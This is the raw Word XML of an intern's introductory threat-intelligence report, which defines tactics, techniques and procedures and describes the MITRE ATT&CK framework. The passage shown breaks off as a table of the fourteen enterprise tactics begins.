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866CA3" w14:textId="2AEC20CE" w:rsidR="00D60AEC" w:rsidRPr="001B7DD6" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Threat Intelligence Proof-of-Concept (PoC) Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C81A37E" w14:textId="0495D7DA" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Name:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> Swadhin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Das</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3469E31A" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intern ID:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> 396</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7BC6B2" w14:textId="40FD9EA4" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Organization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Digisuraksha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Parhari</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0982667F" w14:textId="33BFF287" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Introduction to Threat Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6880BD36" w14:textId="24E4408B" w:rsidR="00AB41A4" w:rsidRPr="00D60AEC" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:r w:rsidRPr="00E817BE">
        <w:t>Threat intelligence is about learning</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">collecting, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>analyzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, and applying knowledge</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> about current and potential threats</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> means</w:t>
      </w:r>
      <w:r w:rsidRPr="00E817BE">
        <w:t xml:space="preserve"> how cyber attackers plan, carry out, and succeed in their attacks, so we can defend ourselves and respond faster. It organizes attackers’ goals (tactics), their methods (techniques), and actual steps taken (procedures) into a structured playbook.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB41A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">The goal is to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>defend systems and networks</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> by understanding what attackers </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>do  and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> how.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0114E99C" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t>In simple terms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A52B434" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tactic</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> = What the attacker is trying to achieve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D80103" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Technique</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> = How they are doing it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ABB86E" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> = Real-world steps or commands used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CF1839" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Understanding this helps security teams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E10865" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Stop attacks earlier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0BBB52" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Improve detection and response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701E0E34" w14:textId="0418C6E1" w:rsidR="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Train better defen</w:t>
      </w:r>
      <w:r w:rsidR="001B7DD6">
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>es</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C13E3CA" w14:textId="0E76580E" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00AB41A4" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00E817BE">
        <w:t>The industry standard for this is the MITRE ATT&amp;CK framework—a giant “map” of how real-world attackers operate, so defenders speak the same language and don’t miss crucial steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3216A2D0" w14:textId="5354D03D" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why Threat Intelligence Matters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42"/>
        <w:gridCol w:w="4655"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="1D0A54C8" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2970C4A7" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Benefit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66351242" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="27511DC3" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3063383A" w14:textId="429A07F3" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Proactive Defen</w:t>
            </w:r>
            <w:r w:rsidR="001B7DD6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6970CC0E" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Identify threats before they hit the system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="64C8B673" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DEF9229" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Faster Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AC7244F" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t xml:space="preserve">Recognize common attacker </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D60AEC">
              <w:t>behaviors</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D60AEC">
              <w:t xml:space="preserve"> (TTPs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="3157FC2E" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="030C4C1F" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Rapid Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09D0FBC9" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Use known patterns to act quickly in incidents</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="043BC7DF" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="177236FD" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Adaptive Controls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13B43AAD" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Improve firewall, antivirus, and user policies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="6145A184" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="046F56A6" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Threat Actor Insights</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E5BC29C" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Know the attacker’s goals, tools, and motives</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="625479CF" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47522802" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Better Awareness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35D5B383" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Share data with others for collective protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03827BEE" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRDefault="00AB41A4" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AEA99D0" w14:textId="3FD8FDA7" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What Is the MITRE ATT&amp;CK Framework?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751BB06D" w14:textId="1825EA40" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">MITRE ATT&amp;CK is a globally recognized framework that </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">categorizes attacker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> into </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tactics</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AB41A4" w:rsidRPr="00AB41A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB41A4" w:rsidRPr="00E817BE">
        <w:t>Each “tactic” explains WHY attackers act a certain way during an attack, from the first moment they choose a target until the damage is done or the attack is discovered.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97"/>
        <w:gridCol w:w="4510"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="10E0D33A" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="424C4D11" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04356E9B" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="2E5079B7" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C142446" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BC060DA" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>The goal or reason behind an action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="4D5FB4BD" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="605A383F" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="002CAFC4" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>The method used to achieve the goal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="61F84812" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BA59BE3" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B5A4AE6" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>The exact real-world example, like commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34EBA200" w14:textId="00AB2C55" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The 14 Enterprise Tactics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9"/>
        <w:gridCol w:w="2322"/>
        <w:gridCol w:w="975"/>
        <w:gridCol w:w="4795"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="478EFE8B" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EB29C89" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
